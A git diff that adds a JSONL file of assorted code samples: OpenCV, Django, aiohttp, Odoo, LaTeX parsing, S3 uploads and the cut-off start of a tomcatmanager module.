diff --git "a/2497.jsonl" "b/2497.jsonl"
new file mode 100644
--- /dev/null
+++ "b/2497.jsonl"
@@ -0,0 +1,671 @@
+{"seq_id":"389535444","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread(\"farah\\Reading.jpg\")\n\nprint(img.shape)\n\n#using Pythagoras\nwidth, height = 565 ,819 \n\n#get them from Windows Paint\npts1 = np.float32([[72,272],[621,139],[312,1055],[960,881]])\npts2 = np.float32([[0,0],[width,0],[0,height],[width, height]])\nmatrix = cv2.getPerspectiveTransform(pts1,pts2)\nimgOutput = cv2.warpPerspective(img, matrix, (width, height))\n\n\ncv2.imshow(\"Image\" , img)\ncv2.imshow(\"Output\", imgOutput)\n\ncv2.waitKey(0)","sub_path":"chp5.py","file_name":"chp5.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"316316723","text":"from django.core.management.base import BaseCommand\nfrom django.utils import timezone\n\nfrom player.tenhou.models import TenhouNickname\n\n\ndef get_date_string():\n return timezone.now().strftime(\"%H:%M:%S\")\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n print(\"{0}: Start\".format(get_date_string()))\n\n tenhou_objects = TenhouNickname.objects.all()\n now = timezone.now().date()\n for tenhou_object in tenhou_objects:\n delta = now - tenhou_object.last_played_date\n if delta.days > 181:\n print(\"{} days {}\".format(tenhou_object.tenhou_username, delta.days))\n\n tenhou_object.is_active = False\n tenhou_object.save()\n\n # we disabled main account for the player\n # maybe there is another account to be main one\n if tenhou_object.is_main:\n other_objects = TenhouNickname.objects.filter(player=tenhou_object.player, is_active=True).first()\n\n if other_objects:\n other_objects.is_main = True\n other_objects.save()\n\n print(\"{0}: End\".format(get_date_string()))\n","sub_path":"server/player/tenhou/management/commands/mark_not_active_tenhou_accounts.py","file_name":"mark_not_active_tenhou_accounts.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"552695524","text":"__author__ = 'ldk'\nfrom django.conf.urls import patterns, include, url\nimport blog.views\n\nurlpatterns = patterns('',\n url(r'^login/', blog.views.my_view, name='login'),\n url(r'^register/', blog.views.register, name='register'),\n url(r'^blog/$', blog.views.archive, name='archive'),\n url(r'^$', blog.views.blog_list, name='blog_list'),\n url(r'^detail/$', blog.views.blog_detail, name='blog_detail'),\n\n )\n","sub_path":"blogsite/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"381818895","text":"# -*- coding: utf-8 -*-\n# need to upgrade the default Python version on Ubuntu 16.04\n# refer:\n# https://askubuntu.com/questions/865554/how-do-i-install-python-3-6-using-apt-get\n# https://aiohttp.readthedocs.io/en/stable/web_advanced.html#static-file-handling\nimport os\nimport logging\n\ntry:\n from aiohttp import web\nexcept ImportError:\n os.system('pip install aiohttp')\n from aiohttp import web\n\n\n# enable logging\nlogging.basicConfig(level=logging.DEBUG)\n# current directory\nCWD = os.path.dirname(os.path.abspath(__file__))\n\n@web.middleware\nasync def mw_index(request, handler):\n '''middleware [serve index.html as the default file]'''\n global CWD\n # if the requested path is a directory\n path = request.path[1:(-1 if request.path.endswith('/') else None):]\n lp = path.replace('/', os.sep)\n idxd = 
os.path.join(CWD, lp)\n if os.path.exists(idxd) and os.path.isdir(idxd):\n idxdf = os.path.join(idxd, 'index.html')\n if os.path.exists(idxdf):\n idxu = '/' + path + ('/' if len(path) > 0 else '') + 'index.html'\n return web.HTTPFound(idxu)\n resp = await handler(request)\n return resp\n\napp = web.Application(middlewares=[mw_index])\n\nstatic_route = web.static(\n '/',\n CWD,\n show_index=True)\napp.add_routes([static_route])\n\nif __name__ == '__main__':\n run_cfg = {\n 'host': '0.0.0.0',\n 'port': 9876\n }\n web.run_app(app, **run_cfg)\n","sub_path":"static-server.py","file_name":"static-server.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"38869130","text":"def set_enabled_vlans(api, name, vlans_enabled_list):\n updated = False\n to_add_vlans = []\n try:\n if (vlans_enabled_list is None):\n return updated\n current_vlans = get_vlan(api, name)\n if ('ALL' in vlans_enabled_list):\n if ((len(current_vlans['vlans']) > 0) or (current_vlans['state'] is 'STATE_ENABLED')):\n api.LocalLB.VirtualServer.set_vlan(virtual_servers=[name], vlans=[{\n 'state': 'STATE_DISABLED',\n 'vlans': [],\n }])\n updated = True\n else:\n if (current_vlans['state'] is 'STATE_DISABLED'):\n to_add_vlans = vlans_enabled_list\n else:\n for vlan in vlans_enabled_list:\n if (vlan not in current_vlans['vlans']):\n updated = True\n to_add_vlans = vlans_enabled_list\n break\n if updated:\n api.LocalLB.VirtualServer.set_vlan(virtual_servers=[name], vlans=[{\n 'state': 'STATE_ENABLED',\n 'vlans': [to_add_vlans],\n }])\n return updated\n except bigsuds.OperationFailed as e:\n raise Exception(('Error on setting enabled vlans : %s' % e))","sub_path":"Data Set/bug-fixing-3/1b2411c6d2e5ff203d69d4f357bc78b72ed87f14--bug.py","file_name":"1b2411c6d2e5ff203d69d4f357bc78b72ed87f14--bug.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"360610329","text":"import os\nimport re\nimport my_logging\nfrom distutils import dir_util\nfrom typing import Dict, List\nfrom shutil import copyfile\n\nfrom my_logging.log_context import log_context, add_log_context, remove_log_context\nfrom utils.helpers import read_file, save_to_file, prepend_to_lines\nfrom transaction.run import get_runner, run_function, list_to_str\n\n\nscript_dir = os.path.dirname(os.path.realpath(__file__))\ntemplate = os.path.join(script_dir, '..', 'app-template')\n\n\nclass ScenarioGenerator:\n\n def __init__(self, directory: str, filename: str, keys: Dict[str, int]):\n add_log_context('inputfileTx', filename)\n # locations\n self.directory = directory\n self.filename = filename\n self.output_directory = os.path.join(directory, 'compiled')\n self.code_file = os.path.join(directory, filename)\n\n # copy template to current directory\n self.scenario_directory = os.path.join(self.directory, 'scenario')\n dir_util.copy_tree(template, self.scenario_directory)\n self.scenario_js_file = os.path.join(self.scenario_directory, 'scenario.js')\n self.scenario_js = read_file(self.scenario_js_file)\n self.deploy_js_file = os.path.join(self.scenario_directory, 'migrations', '2_deploy_contracts.js')\n self.deploy_js = read_file(self.deploy_js_file)\n\n # copy contracts\n for filename in os.listdir(self.output_directory):\n if filename.endswith('.sol'):\n source = os.path.join(self.output_directory, filename)\n target = os.path.join(self.scenario_directory, 'contracts', filename)\n 
copyfile(source, target)\n\n # prepare logging\n log_file = my_logging.get_log_file(None, self.scenario_directory, 'transactions', False)\n my_logging.prepare_logger(log_file)\n\n # prepare runner\n self.r = get_runner(self.output_directory, self.code(), self.name(), keys)\n\n # others\n self.transactions = []\n self.set_contract_name()\n self.set_accounts(keys)\n self.set_pk_announce(keys)\n self.set_contract_fetch()\n self.set_verifiers()\n\n self.n_calls = 0\n\n def code(self):\n return read_file(self.code_file)\n\n def name(self):\n c = self.code()\n m = re.search('contract ([^ {]*)', c)\n return m.group(1)\n\n def set_contract_name(self):\n contract_name = f'helpers.contract_name = \"{self.name()}\";'\n self.scenario_js = self.scenario_js.replace('$CONTRACT_NAME', contract_name)\n self.deploy_js = self.deploy_js.replace('$CONTRACT_NAME', contract_name)\n\n def set_contract_fetch(self):\n contract_fetch = f'var contract = artifacts.require(\"{self.name()}\");'\n self.scenario_js = self.scenario_js.replace('$CONTRACT_FETCH', contract_fetch)\n\n def set_pk_announce(self, keys: Dict[str, int]):\n lines = []\n for k, v in keys.items():\n lines += [f'await helpers.tx(genPublicKeyInfrastructure, \"announcePk\", [{v}], {k});']\n lines = '\\n'.join(lines)\n lines = prepend_to_lines(lines, '\\t')\n self.scenario_js = self.scenario_js.replace('$PK_ANNOUNCE', lines)\n\n def set_accounts(self, keys: Dict[str, int]):\n lines = []\n for i, k in enumerate(keys.keys()):\n lines += [f'var {k} = accounts[{i}];']\n lines = '\\n'.join(lines)\n lines = prepend_to_lines(lines, '\\t')\n self.scenario_js = self.scenario_js.replace('$ACCOUNTS', lines)\n\n def set_verifiers(self):\n verifiers_fetch = []\n verifiers_deploy = []\n verifiers_wait = []\n for c in self.r.compiler_information.used_contracts:\n if 'PublicKeyInfrastructure' not in c.contract_name:\n verifiers_fetch += [f'var {c.state_variable_name} = artifacts.require(\"{c.contract_name}\");']\n verifiers_deploy += [f'await deployer.link(pairing, {c.state_variable_name});\\nawait deployer.link(bn256g2, {c.state_variable_name});\\nawait helpers.deploy(web3, deployer, {c.state_variable_name}, [], accounts[0]);']\n verifiers_wait += [f'{c.state_variable_name} = await {c.state_variable_name}.deployed();']\n verifiers_fetch = prepend_to_lines('\\n'.join(verifiers_fetch), '\\t')\n verifiers_deploy = prepend_to_lines('\\n'.join(verifiers_deploy), '\\t')\n verifiers_wait = prepend_to_lines('\\n'.join(verifiers_wait), '\\t')\n self.deploy_js = self.deploy_js \\\n .replace('$VERIFIERS_FETCH', verifiers_fetch) \\\n .replace('$VERIFIERS_DEPLOY', verifiers_deploy)\n self.scenario_js = self.scenario_js.replace('$VERIFIERS_FETCH', verifiers_fetch)\n self.scenario_js = self.scenario_js.replace('$VERIFIERS_WAIT', verifiers_wait)\n\n def run_function(self, function_name: str, me: str, args: List):\n with log_context('nCalls', self.n_calls):\n self.n_calls += 1\n with log_context('runFunction', function_name):\n real_args = run_function(self.r, function_name, me, args)\n\n args_str = list_to_str(args)\n real_args_str = list_to_str(real_args)\n\n if function_name == 'constructor':\n t = f'// {function_name}({args_str})\\nargs = [{real_args_str}];\\nlet contract_instance = await helpers.deploy_x(web3, contract, args, {me});'\n t = prepend_to_lines(t, '\\t')\n self.scenario_js = self.scenario_js.replace('$CONTRACT_DEPLOY', t)\n else:\n t = f'// {function_name}({args_str})\\nargs = [{real_args_str}];\\nawait helpers.tx(contract_instance, \"{function_name}\", args, {me});'\n 
t = prepend_to_lines(t, '\\t')\n self.transactions += [t]\n\n def finalize(self):\n transactions = '\\n\\n'.join(self.transactions)\n self.scenario_js = self.scenario_js.replace('$TRANSACTIONS', transactions)\n\n save_to_file(None, self.scenario_js_file, self.scenario_js)\n save_to_file(None, self.deploy_js_file, self.deploy_js)\n remove_log_context('inputfileTx')\n","sub_path":"eval-ccs2019/examples/scenarios.py","file_name":"scenarios.py","file_ext":"py","file_size_in_byte":6092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"50561721","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# This module uses OpenERP, Open Source Management Solution Framework.\n# Copyright (C) 2014-Today BrowseInfo ()\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see \n#\n##############################################################################\nfrom odoo import api, fields, models, _\nfrom odoo.tools.translate import _\nimport odoo.addons.decimal_precision as dp\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import datetime\nfrom odoo.exceptions import UserError\nfrom odoo.tools import float_is_zero, float_compare, DEFAULT_SERVER_DATETIME_FORMAT\nfrom odoo import SUPERUSER_ID\n\n\nclass Sale(models.Model):\n _inherit = \"sale.order\"\n \n '''@api.model\n def default_get(self, fields):\n res = super(Sale, self).default_get(fields)\n if self._context.get('active_id'):\n active_id = self._context.get('active_id')\n crm_brw = self.env['crm.lead'].browse(active_id)\n warehouse_search = self.env['stock.warehouse'].search([('company_id','=',crm_brw.company_id.id)])\n if self._context.get('default_opportunity_id'):\n res['compnay_id'] = crm_brw.company_id.id\n res['warehouse_id'] = warehouse_search.id and warehouse_search[0].id or False\n return res'''\n \n\n @api.onchange('company_id')\n def onchange_company_id(self):\n if self.company_id:\n search_warehouse = self.env['stock.warehouse'].search([('company_id','=',self.company_id.id)])\n self.warehouse_id = search_warehouse and search_warehouse[0].id or False\n \n @api.multi\n def _create_invoice(self, order, so_line, amount):\n inv_obj = self.env['account.invoice']\n ir_property_obj = self.env['ir.property']\n\n account_id = False\n if self.product_id.id:\n account_id = self.product_id.property_account_income_id.id\n if not account_id:\n prop = ir_property_obj.get('property_account_income_categ_id', 'product.category')\n prop_id = prop and prop.id or False\n account_id = order.fiscal_position_id.map_account(prop_id)\n if not account_id:\n raise UserError(\n _('There is no income account defined for this product: \"%s\". 
You may have to install a chart of account from Accounting app, settings menu.') % \\\n (self.product_id.name,))\n\n if self.amount <= 0.00:\n raise UserError(_('The value of the down payment amount must be positive.'))\n if self.advance_payment_method == 'percentage':\n amount = order.amount_untaxed * self.amount / 100\n name = _(\"Down payment of %s%%\") % (self.amount,)\n else:\n amount = self.amount\n name = _('Down Payment')\n invoice = inv_obj.create({\n 'name': order.client_order_ref or order.name,\n 'origin': order.name,\n 'type': 'out_invoice',\n 'reference': False,\n 'account_id': order.partner_id.property_account_receivable_id.id,\n 'partner_id': order.partner_invoice_id.id,\n 'invoice_line_ids': [(0, 0, {\n 'name': name,\n 'origin': order.name,\n 'account_id': account_id,\n 'price_unit': amount,\n 'quantity': 1.0,\n 'discount': 0.0,\n 'uom_id': self.product_id.uom_id.id,\n 'product_id': self.product_id.id,\n 'sale_line_ids': [(6, 0, [so_line.id])],\n 'invoice_line_tax_ids': [(6, 0, [x.id for x in self.product_id.taxes_id])],\n 'account_analytic_id': order.project_id.id or False,\n 'company_id': self.company_id.id,\n })],\n 'currency_id': order.pricelist_id.currency_id.id,\n 'payment_term_id': order.payment_term_id.id,\n 'fiscal_position_id': order.fiscal_position_id.id or order.partner_id.property_account_position_id.id,\n 'team_id': order.team_id.id,\n })\n invoice.compute_taxes()\n return invoice\n \n \n @api.multi\n def _prepare_invoice(self ):\n \"\"\"\n Prepare the dict of values to create the new invoice for a sales order. This method may be\n overridden to implement custom invoice generation (making sure to call super() to establish\n a clean extension chain).\n \"\"\"\n property_obj = self.env['ir.property']\n field_obj = self.env['ir.model.fields']\n self.ensure_one()\n journal_ids = self.env['account.journal'].search(\n [('type', '=', 'sale'), ('company_id', '=', self.company_id.id)])\n if not journal_ids:\n raise UserError(_('There is no Account for %s Company. You may have to set a chart of account from Accounting app, settings menu.') % \\\n (self.company_id.name,))\n field_ids = field_obj.search([('field_description', '=', 'Account Receivable')])\n if field_ids:\n for field in field_ids:\n property_id = property_obj.search([('fields_id', '=', field.id), ('company_id', '=', self.company_id.id)])\n if property_id:\n acc_ref = property_obj.browse(property_id[0].id).value_reference\n account_id = acc_ref and acc_ref.split(',') and acc_ref.split(',')[1]\n account_id = int(account_id)\n else:\n raise UserError( _('There is no Account for %s Company. 
You may have to set a chart of account from Accounting app, settings menu.') % \\\n (self.company_id.name,))\n# bank_account_id = False\n# if self.partner_id:\n# if self.partner_id.company_id:\n# company_obj = self.env['res.company'].browse(self.partner_id.company_id.id)\n# if company_obj.bank_ids:\n# bank_account_id = company_obj.bank_ids[0].id\n invoice_vals = {\n 'name': self.client_order_ref or '',\n 'origin': self.name,\n 'type': 'out_invoice',\n 'reference': self.client_order_ref or self.name,\n 'account_id': account_id ,\n 'partner_id': self.partner_invoice_id.id,\n 'journal_id': journal_ids[0].id,\n 'currency_id': self.pricelist_id.currency_id.id,\n 'comment': self.note,\n 'payment_term_id': self.payment_term_id.id,\n 'fiscal_position_id': self.fiscal_position_id.id or self.partner_invoice_id.property_account_position_id.id,\n 'company_id': self.company_id.id,\n 'user_id': self.user_id and self.user_id.id,\n 'team_id': self.team_id.id,\n # 'partner_bank_id': bank_account_id or False,\n }\n return invoice_vals\n \nclass sale_order_line(models.Model):\n _inherit = 'sale.order.line'\n \n @api.multi\n def _compute_tax_id(self):\n for line in self:\n fpos = line.order_id.fiscal_position_id or line.order_id.partner_id.property_account_position_id\n if fpos:\n # The superuser is used by website_sale in order to create a sale order. We need to make\n # sure we only select the taxes related to the company of the partner. This should only\n # apply if the partner is linked to a company.\n if self.env.uid == SUPERUSER_ID and line.order_id.company_id:\n taxes = fpos.map_tax(line.product_id.taxes_id).filtered(lambda r: r.company_id == line.order_id.company_id)\n else:\n taxes = fpos.map_tax(line.product_id.taxes_id).filtered(lambda r: r.company_id == line.order_id.company_id)\n line.tax_id = taxes\n else:\n line.tax_id = line.product_id.taxes_id.filtered(lambda r: r.company_id == line.order_id.company_id) if line.product_id.taxes_id else False\n \n @api.multi\n @api.onchange('product_id')\n def product_id_change(self):\n if not self.product_id:\n return {'domain': {'product_uom': []}}\n\n vals = {}\n domain = {'product_uom': [('category_id', '=', self.product_id.uom_id.category_id.id)]}\n if not (self.product_uom and (self.product_id.uom_id.category_id.id == self.product_uom.category_id.id)):\n vals['product_uom'] = self.product_id.uom_id\n\n product = self.product_id.with_context(\n lang=self.order_id.partner_id.lang,\n partner=self.order_id.partner_id.id,\n quantity=self.product_uom_qty,\n date=self.order_id.date_order,\n pricelist=self.order_id.pricelist_id.id,\n uom=self.product_uom.id\n )\n\n name = product.name_get()[0][1]\n if product.description_sale:\n name += '\\n' + product.description_sale\n vals['name'] = name\n self._compute_tax_id()\n\n if self.order_id.pricelist_id and self.order_id.partner_id:\n vals['price_unit'] = self.env['account.tax']._fix_tax_included_price(product.price, product.taxes_id, self.tax_id)\n self.update(vals)\n return {'domain': domain}\n \n \n @api.multi\n def _prepare_invoice_line(self, qty ):\n \"\"\"\n Prepare the dict of values to create the new invoice line for a sales order line.\n\n :param qty: float quantity to invoice\n \"\"\"\n self.ensure_one()\n res = {}\n property_obj = self.env['ir.property']\n field_obj = self.env['ir.model.fields']\n if self.invoice_status != 'invoiced':\n # if not account_id:\n if self.product_id:\n field_id = field_obj.search( [('field_description', '=', 'Income Account'), ('name', '=', 
'property_account_income_categ_id')])\n if field_id and self._context:\n property_id = property_obj.search([('fields_id', '=', field_id[0].id), ('company_id', '=', self.order_id.company_id.id)])\n else:\n property_id = False\n if property_id:\n acc_ref = property_obj.browse( property_id[0].id).value_reference\n account_id = acc_ref and acc_ref.split(',') and acc_ref.split(',')[1]\n account_id = int(account_id)\n else:\n account_id = False\n \n if not account_id:\n field_id = field_obj.search([('field_description', '=', 'Income Account'), ('name', '=', 'property_account_income_categ_id')])\n if field_id and self._context:\n property_id = property_obj.search( [('fields_id', '=', field_id[0].id), ('company_id', '=', self.order_id.company_id.id)])\n else:\n property_id = False\n if property_id:\n acc_ref = property_obj.browse(property_id[0]).value_reference\n account_id = acc_ref and acc_ref.split(',') and acc_ref.split(',')[1]\n account_id = int(account_id)\n else:\n account_id = False\n if not account_id:\n raise UserError(_('Error!'),\n _('Please define income account for this product: \"%s\" (id:%d).') % \\\n (self.product_id.name, self.product_id.id,))\n else:\n prop = self.pool.get('ir.property').get(\n 'property_account_income_categ_id', 'product.category')\n account_id = prop and prop.id or False\n# uosqty = self._get_line_qty(self)\n# pu = 0.0\n# if uosqty:\n# pu = round(self.price_unit * self.product_uom_qty / uosqty,\n# self.pool.get('decimal.precision').precision_get('Product Price'))\n# fpos = self.order_id.fiscal_position or False\n# account_id = self.pool.get('account.fiscal.position').map_account(fpos, account_id)\n if not account_id:\n raise UserError(_('Error!'),\n _('There is no Fiscal Position defined or Income category account defined for default properties of Product categories.'))\n res = {\n 'name': self.name,\n 'sequence': self.sequence,\n 'origin': self.order_id.name,\n 'account_id': account_id or False,\n 'price_unit': self.price_unit,\n 'quantity': qty,\n 'discount': self.discount,\n 'uom_id': self.product_uom.id,\n 'product_id': self.product_id.id or False,\n 'invoice_line_tax_ids': [(6, 0, self.tax_id.ids)],\n 'account_analytic_id': self.order_id.analytic_account_id.id,\n }\n return res\n \n \n @api.multi\n def invoice_line_create(self, invoice_id, qty):\n \"\"\"\n Create an invoice line. 
The quantity to invoice can be positive (invoice) or negative\n (refund).\n\n :param invoice_id: integer\n :param qty: float quantity to invoice\n \"\"\"\n precision = self.env['decimal.precision'].precision_get('Product Unit of Measure')\n for line in self:\n ctx = dict(self._context, lang=self.order_id.partner_id.lang)\n ctx['sale_id'] = line.order_id \n if not float_is_zero(qty, precision_digits=precision):\n vals = line._prepare_invoice_line(qty=qty)\n vals.update({'invoice_id': invoice_id, 'sale_line_ids': [(6, 0, [line.id])]})\n self.env['account.invoice.line'].create(vals) \n \nclass stock_move(models.Model):\n _inherit = 'stock.move'\n \n sale_line_id = fields.Many2one('sale.order.line', 'Sale Order Line')\n\n\n def attribute_price(self,cr, uid, move, context=None):\n \"\"\"\n Attribute price to move, important in inter-company moves or receipts with only one partner\n \"\"\"\n if not move.price_unit:\n price = move.sale_line_id and move.sale_line_id.price_unit or 0.0\n self.write(cr, uid,[move.id], {'price_unit': price}) \n \n\n# class ProcurementOrder(models.Model):\n# _inherit = \"procurement.order\"\n \n# def _run_move_create(self,cr, uid ,procurement, context=None):\n# ''' Returns a dictionary of values that will be used to create a stock move from a procurement.\n# This function assumes that the given procurement has a rule (action == 'move') set on it.\n\n# :param procurement: browse record\n# :rtype: dictionary\n# '''\n \n# if procurement.product_id.is_pack==True:\n# return {}\n# newdate = (datetime.strptime(procurement.date_planned, '%Y-%m-%d %H:%M:%S') - relativedelta(days=procurement.rule_id.delay or 0)).strftime('%Y-%m-%d %H:%M:%S')\n# group_id = False\n# if procurement.rule_id.group_propagation_option == 'propagate':\n# group_id = procurement.group_id and procurement.group_id.id or False\n# elif procurement.rule_id.group_propagation_option == 'fixed':\n# group_id = procurement.rule_id.group_id and procurement.rule_id.group_id.id or False\n# #it is possible that we've already got some move done, so check for the done qty and create\n# #a new move with the correct qty\n# already_done_qty = 0\n# for move in procurement.move_ids:\n# already_done_qty += move.product_uom_qty if move.state == 'done' else 0\n# qty_left = max(procurement.product_qty - already_done_qty, 0)\n# vals = {\n# 'name': procurement.name,\n# #'company_id': procurement.rule_id.company_id.id or procurement.rule_id.location_src_id.company_id.id or procurement.rule_id.location_id.company_id.id or procurement.company_id.id,\n# 'company_id': procurement.company_id.id or procurement.rule_id.company_id.id or procurement.rule_id.location_src_id.company_id.id or procurement.rule_id.location_id.company_id.id,\n# 'product_id': procurement.product_id.id,\n# 'product_uom': procurement.product_uom.id,\n# 'product_uom_qty': qty_left,\n# 'partner_id': procurement.rule_id.partner_address_id.id or (procurement.group_id and procurement.group_id.partner_id.id) or False,\n# 'location_id': procurement.rule_id.location_src_id.id,\n# 'location_dest_id': procurement.location_id.id,\n# 'move_dest_id': procurement.move_dest_id and procurement.move_dest_id.id or False,\n# 'procurement_id': procurement.id,\n# 'rule_id': procurement.rule_id.id,\n# 'procure_method': procurement.rule_id.procure_method,\n# 'origin': procurement.origin,\n# 'picking_type_id': procurement.rule_id.picking_type_id.id,\n# 'group_id': group_id,\n# 'route_ids': [(4, x.id) for x in procurement.route_ids],\n# 'warehouse_id': 
procurement.rule_id.propagate_warehouse_id.id or procurement.rule_id.warehouse_id.id,\n# 'date': newdate,\n# 'date_expected': newdate,\n# 'propagate': procurement.rule_id.propagate,\n# 'priority': procurement.priority,\n# 'sale_line_id': procurement.sale_line_id and procurement.sale_line_id.id,\n# }\n# return vals\n \n# def _run(self, cr, uid, procurement, context=None):\n \n# if procurement.rule_id and procurement.rule_id.action == 'move':\n# if not procurement.rule_id.location_src_id:\n# self.message_post(cr, uid, [procurement.id], body=_('No source location defined!'), context=context)\n# return False\n# move_obj = self.pool.get('stock.move')\n \n# move_dict = self._run_move_create(cr, uid, procurement, context=context)\n \n# #create the move as SUPERUSER because the current user may not have the rights to do it (mto product launched by a sale for example)\n# if not move_dict:\n# return True\n# move_obj.create(cr, SUPERUSER_ID, move_dict, context=context)\n# return True\n# return super(procurement_order, self)._run(cr, uid, procurement, context=context)\n \n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"sasmar_user_preference/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":19099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"463602122","text":"__author__ = 'Serg'\nfrom core import TImporter\nfrom core import TSimplexTable\nimport re\n\nclass LatexImporter(TImporter.TImporter):\n def parseText(self):\n text = self.importText.lower().replace(' ','').replace('\\n','')#всё в нижний регистр и удалить пробелы\n equations = text.split('\\\\\\\\')\n targetFunctionId = None\n rExtractMembers = re.compile('[\\+-]?[0-9]*[a-zA-Z][_]{[0-9]*}', re.UNICODE)\n rExtractMemberParts = re.compile('([\\+-]?)([0-9]*)([a-zA-Z]{1})_{([0-9]*|([0-9]*[.]*[0-9]*))}', re.UNICODE)\n rExtractConstraints = re.compile('(\\\\\\\\geq|=|\\\\\\\\leq|>|<)([0-9]*)', re.UNICODE)\n rExtractTargetFunctionType = re.compile('(\\\\\\\\rightarrow)(\\\\\\\\max|\\\\\\\\min)',re.UNICODE)\n i = 0\n system = []\n\n #определяет размерность матрицы\n matrixWidth = 0\n matrixHeight = 0\n for eq in equations:\n if len(eq.strip())==0:\n continue\n if eq.find('l=')<0:\n matrixHeight+=1\n eqMembers = rExtractMembers.findall(eq)\n for member in eqMembers:\n memberParts = rExtractMemberParts.findall(member)[0]\n\n if int(memberParts[3])>matrixWidth:\n matrixWidth = int(memberParts[3])\n\n #дальнейший разбор членов\n for eq in equations:\n if eq.find('l=')>=0:\n targetFunctionId = i\n eq.replace('l=','')\n eqMembers = rExtractMembers.findall(eq)\n #will extract signs and constraint values\n if targetFunctionId==i:\n constraintType = rExtractTargetFunctionType.findall(eq)[0][1]\n #print('L constraint type: '+constraintType)\n constraintType = constraintType=='\\\\max'\n #will extract member coefficients\n coefficients = [0 for i in range(matrixWidth)]\n\n for member in eqMembers:\n memberParts = rExtractMemberParts.findall(member)[0]\n if memberParts[1]=='':\n num = 1\n else:\n num = float(memberParts[1])\n if memberParts[0]=='-':\n num=num*(-1)\n coefficients.__setitem__(int(memberParts[3])-1,num)\n if targetFunctionId!=i:\n constraint = rExtractConstraints.findall(eq)[0]\n system.append((coefficients,self.translateLatexToConstraint(constraint[0]),float(constraint[1])))\n else:\n Z = coefficients\n\n i += 1\n return [system,Z,constraintType]\n\n def translateLatexToConstraint(self, param):\n if param==\"\\\\leq\" :\n return 
\"<=\"\n if param==\"\\\\geq\":\n return \">=\"\n return param\n\n","sub_path":"core/latexImporter.py","file_name":"latexImporter.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"421076029","text":"import boto3\n\ndef upload():\n\tpath = './divided_by_20_keras_model/by_one/'\n\t#path = './divided_by_20/'\n\ts3 = boto3.resource('s3')\n\tbucket = s3.Bucket('takenaka')\n\tbucket_path = 'model_STD_1_723/'\n\t#bucket_path = 'processed_data_STD/'\n\ttry:\n\t\tfor i in range(1,724):\n\t\t\tfile_stream = 'model_case_%d.h5' % i\n\t\t\t#file_stream = 'datas_%03d_%03d.npy' % (i, i)\n\t\t\tbucket.upload_file(path +file_stream, bucket_path + file_stream)\n\t\t\tprint(path+file_stream)\n\texcept:\n\t\timport traceback\n\t\ttraceback.print_exc()\nif __name__ == '__main__':\n\tupload()\n","sub_path":"python_shell_s3_upload.py","file_name":"python_shell_s3_upload.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"235469099","text":"#\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2007 Jared Crapo\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n\"\"\"\ntomcatmanager.models\n--------------------\n\nThis module contains the data objects created by and used by tomcatmanager.\n\"\"\"\n\nfrom typing import TypeVar\n\nfrom attrdict import AttrDict\nimport requests\n\nimport tomcatmanager as tm\n\n\nclass TomcatError(Exception):\n \"\"\"\n Raised when the Tomcat Server responds with an error.\n \"\"\"\n\n###\n#\n# build status codes\n#\n###\nSTATUS_CODES = {\n # 'sent from tomcat': 'friendly name'\n 'OK': 'ok',\n 'FAIL': 'fail',\n # if we can't find tomcat, we invent a NOTFOUND value\n 'NOTFOUND': 'notfound',\n}\n# pylint: disable=invalid-name\nstatus_codes = AttrDict()\nfor _code, _title in STATUS_CODES.items():\n status_codes[_title] = _code\n\n\n# pylint: disable=too-many-instance-attributes\nclass TomcatManagerResponse:\n \"\"\"\n Returned as the response for :class:`.TomcatManager` commands.\n\n After running a command, it's a good idea to check and make sure that\n the command completed succesfully before relying on the results::\n\n >>> import 